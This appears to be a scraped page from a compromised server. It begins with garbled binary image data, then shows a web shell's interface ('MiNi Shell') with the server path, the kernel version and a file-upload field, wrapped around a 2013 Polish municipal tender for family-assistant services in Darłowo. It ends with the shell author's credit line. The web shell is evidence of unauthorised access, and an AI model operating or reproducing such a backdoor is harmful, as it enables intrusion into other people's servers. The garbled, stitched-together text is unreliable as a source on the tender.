JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130515/190326-N-2013.html

<p class="kh_header"><b>Darłowo: Świadczenie  usług asystenta rodziny dla uczestników  projektu systemowego  Szansa na rozwój  realizowanego w latach 2013 i 2014 - w roku 2013  przez Miejski Ośrodek Pomocy Społecznej w Darłowie  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 190326 - 2013; data zamieszczenia: 15.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. O.D. Tynieckiego 20, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3146776, faks 94 3146776.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.darlowo.pl www.pokl.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie  usług asystenta rodziny dla uczestników  projektu systemowego  Szansa na rozwój  realizowanego w latach 2013 i 2014 - w roku 2013  przez Miejski Ośrodek Pomocy Społecznej w Darłowie  współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie w latach 2013 i 2014 - w roku 2013 usług asystenta rodziny dla 10 uczestników ( wraz z otoczeniem- rodziną) zamieszkujących na terenie miasta Darłowa w łącznej ilości  700 godzin, nie mniej jednak, niż 80 godz. miesięcznie. 
2.	Liczba beneficjentów oraz łączny  wymiar godzin usługi może ulec zmniejszeniu w przypadku np. rezygnacji  rodziny z udziału w projekcie  i niemożnością  zastąpienia jej inną rodziną.   
3.	Planowana liczba godzin usługi dla 1 rodziny w całym okresie obowiązywania umowy  wynosi  70 godzin ,przy czym ze względu na szczególny charakter usługi dopuszcza się za zgodą Zamawiającego możliwość  zmniejszenia ilości godzin usługi dla danej rodziny na rzecz innej rodziny bardziej wymagającej  wsparcia  .
4.	Asystent rodziny jest zobowiązany do świadczenia usług w miejscu zamieszkania rodzin oraz na terenie miasta Darłowa w związku z wykonywaniem czynności związanych z pomocą rodzinom w rozwiązywaniu problemów socjalnych, psychologicznych i wychowawczych.
5.	Świadczenie usługi w miejscu zamieszkania rodzin może odbywać się w godzinach pomiędzy 7.00 a 20.00 każdego dnia tygodnia.

6.	W ramach świadczenia usługi  asystent rodziny  będzie zobowiązany do współpracy i osobistego kontaktu z wytypowanymi rodzinami, w tym w szczególności do:

1)	Udzielania pomocy rodzinom w poprawie ich sytuacji życiowej, w tym w zdobywaniu umiejętności prawidłowego prowadzenia gospodarstwa domowego,
2)	Udzielania pomocy rodzinom w rozwiązywania problemów socjalnych, problemów psychologicznych, problemów wychowawczych z dziećmi,
3)	Wspierania aktywności społecznej rodzin,
4)	Motywowania członków rodziny do podnoszenia kwalifikacji zawodowych,
5)	Udzielania pomocy w poszukiwaniu, podejmowaniu i utrzymaniu pracy zarobkowej,
6)	Motywowania do udziału w zajęciach grupowych dla rodziców, mających na celu kształtowanie prawidłowych wzorców rodzicielskich i umiejętności psychospołecznych,
7)	Udzielanie wsparcia dzieciom, w szczególności poprzez udział w zajęciach psychoedukacyjnych,
8)	Podejmowania działań interwencyjnych i zaradczych w sytuacji zagrożenia bezpieczeństwa dzieci i rodzin,
9)	Prowadzenia indywidualnych konsultacji wychowawczych dla rodziców i dzieci,
10)	Sporządzania , na wniosek sądu opinii o rodzinie i jej członkach,
11)	Współpracy z jednostkami administracji rządowej i samorządowej, właściwymi  organizacjami pozarządowymi oraz innymi podmiotami i osobami specjalizującymi się w działaniach na rzecz dziecka i rodziny,
12)	Współpracy z zespołem interdyscyplinarnym lub grupą roboczą, o których mowa w art. 9a ustawy z 29 lipca 2005 roku o przeciwdziałaniu przemocy w rodzinie ( Dz.U z 2005 r Nr 180, poz. 1493 z późn. zmianami),lub innymi podmiotami , których pomoc Wykonawca przy wykonywaniu swoich zadań uzna za niezbędną.
13)	Asystent rodziny nie może przy  wykonywaniu usług wyręczać rodziną w jej codziennych obowiązkach oraz załatwianiu spraw za rodzinę, za wyjątkiem podejmowania działań stanowiących instruktaż.

7.	Ponadto  asystent rodziny jest zobowiązany do:

1)	Uczestnictwa w spotkaniu informacyjnym niezwłocznie po podpisaniu umowy w terminie wskazanym przez Zamawiającego w celu przekazania listy rodzin wytypowanych do współpracy z danymi teleadresowymi oraz listy pracowników socjalnych 
2)	Ścisłej współpracy z pracownikami socjalnymi w zakresie:
a.)	Zapoznania się z sytuacja wytypowanych do współpracy rodzin na wstępie realizacji zadania,
b.)	Zapoznania się z bieżąca dokumentacją prowadzona przez pracownika socjalnego,
c.)	Zapoznanie się z dokumentacją  sporządzona dla rodzin objętych wsparciem przez dotychczasowego asystenta rodziny,
d.)	Informowania pracownika socjalnego o podejmowanych działaniach i pojawiających się problemach,
e.)	Ustalenie pierwszorazowego wspólnego wejścia z pracownikiem socjalnym do wytypowanych do współpracy rodzin po podpisaniu umowy,
3)	Wprowadzania do systemu Wspieranie rodziny i piecza zastępcza danych niezbędnych do sprawozdawczości,
4)	Niezwłoczne powiadomienie pisemne lub telefoniczne Zamawiającego o rezygnacji lub braku współpracy wskazanej rodziny z asystentem rodziny.
5)	W przypadku rezygnacji lub braku współpracy z którąkolwiek z powierzonych do współpracy rodzin, do podjęcia współpracy z kolejną rodziną wskazana przez Zamawiającego. W takim przypadku Wykonawca sporządza dokumentację pracy z rodziną w terminie wskazanym przez Zamawiającego.
6)	Realizacji zadania zgodnie z ustawa z dnia 29 sierpnia 1997 roku o ochronie danych osobowych ( Dz.U. z 2002 r , nr 101, poz. 926 z późn. zmianami),

8.	W celu prawidłowego wykonywania usługi  asystent rodziny jest zobowiązany do prowadzenia dokumentacji dotyczącej pracy z rodziną tj:

1)	Opracowania w konsultacji z pracownikiem socjalnym planu pracy z  rodziną objętą współpracą i przekazania  go Zamawiającemu w terminie 10 dni od zgłoszenia rodziny, wg wzoru stanowiącego załącznik Nr 1 do umowy
2)	Sporządzania miesięcznych  kart wizyt asystenta w rodzinie  (wg wzoru stanowiącego  załącznik Nr 2 do umowy
3)	Sporządzania miesięcznej karty pracy asystenta - wg. wzoru stanowiącego zał. Nr 3 do umowy,
4)	Sporządzania miesięcznego zbiorczego zestawienia ilości godzin usługi asystenta  wg wzoru- zał , nr 4 do umowy.
5)	Sporządzanie okresowej  oceny sytuacji rodziny nie rzadziej niż co kwartał - wg wzoru- zał , Nr 5 .do umowy
6)	Wykonawca  zobowiązany będzie do sporządzenia także innej dokumentacji, jeżeli obowiązek jej 
               prowadzenia będzie wynikał z przepisów prawa obowiązujących w okresie świadczenia  
               przedmiotowych usług.
7)	Wykonawca zobowiązany jest do oznaczania prowadzonej dokumentacji logotypami POKL  i UE oraz 
               informacji o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego. (do    
                pobrania na stronie www.pokl.darlowo.pl.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, polegających na powtórzeniu tego samego rodzaju zamówień stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8, 85.32.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania uprawnień do wykonywania określonej działalności lub czynności będzie spełniony jeżeli Wykonawca przedłoży podpisane Oświadczenie  spełnianiu warunków udziału w postępowaniu- zał. nr 1  do siwz</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 1 do siwz</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca przedłoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu -zał. nr1 do siwz</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr1  do siwz
oraz Wykonawca wykaże, że  osoba realizująca przedmiot zamówienia posiada wykształcenie 
a) wyższe  na kierunku :pedagogika, psychologia, socjologia, nauki o rodzinie lub praca socjalna lub 
b) wykształcenie wyższe na dowolnym kierunku uzupełnione szkoleniem z zakresu pracy z dziećmi lub rodziną  zgodnie z art. 12 ust.3 ustawy z 9.06.2011 r o wspieraniu rodziny i systemie pieczy zastępczej  i udokumentowane co najmniej roczny staż pracy z dziećmi i rodziną lub studiami podyplomowymi obejmującymi zakres programowy szkolenia określony na podst. art. 12 ust. 3 ustawy z dnia 9.06.2011r o wspieraniu rodziny i systemie pieczy zastępczej, i udokumentowany co najmniej roczny staż pracy z dziećmi i rodzina, lub 
c) wykształcenie średnie i szkolenie z z zakresu pracy z dziećmi i rodziną zgodnie z art. 12 ust. 3 ustawy z 9.06.2011 r o wspieraniu rodziny i systemie pieczy zastępczej, oraz udokumentowany  co najmniej 3 letni  staż pracy z dziećmi lub rodziną.
Ponadto Wykonawca wykaże, że osoba realizująca przedmiot zamówienia: 
a) nie jest i nie była pozbawiona władzy rodzicielskiej oraz władza rodzicielska nie jest jej zawieszona lub ograniczona,
 b) wypełnia obowiązek alimentacyjny-w przypadku, gdy taki obowiązek w stosunku do niej wynika z tytułu egzekucyjnego, 
c) nie była skazana prawomocnym wyrokiem za umyślne przestępstwo lub umyślne  przestępstwo skarbowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca przedłoży podpisane Oświadczenie o spełnianiu warunków udziału w postępowaniu - zał. nr 1 do siwz</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy z wykorzystaniem wzoru -zał nr 5 do siwz,
2.	W przypadku Wykonawcy będącego osobą fizyczną nie prowadzącą działalności gospodarczej- oświadczenie złożone  wg wzoru - zał nr 6 do siwz.
3.	Oświadczenie dot. wymogu z art. 12 ust. 1  punkt 2-4 ustawy z 9 czerwca 2011 r o wspieraniu rodziny i systemie pieczy zastępczej wg wzoru -zał nr 4 do siwz.
4.	Dokument( np. pełnomocnictwo, umowa spółki cywilnej, odpis z KRS) potwierdzający, iż oferta została podpisana przez osoby uprawnione do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów dołączonych do oferty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	 Zamawiający dopuszcza możliwość zmiany zawartej umowy w sprawie zamówienia publicznego   w sytuacji

1)	zmiany powszechnie obowiązujących przepisów     prawa w zakresie      mającym wpływ na realizację     przedmiotu zamówienia.

2)	wystąpienia okoliczności mających wpływ na realizacje umowy,  których    nie  można było przewidzieć w chwili zawarcia umowy, lub zmiany są     korzystne dla     Zamawiającego.
3)	zwiększenia ilości godzin usług w sytuacji konieczności przyznania dodatkowego wsparcia uczestnikom      projektu.

2.	Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w drodze aneksu do    umowy , nie naruszając ustawy PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.darlowo.pl www.pokl-darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
O.D. Tynieckiego 20
76-150 Darłowo
tel. 94 314 67-76
fax 94 314 67-76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.05.2013 godzina 08:45, miejsce: Miejski Ośrodek Pomocy Społecznej
O.D. Tynieckiego 20
76-150 Darłowo
pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.06.2013.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn.  Szansa na rozwój realizowany przez Miejski Ośrodek Pomocy Społecznej w Darłowie współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com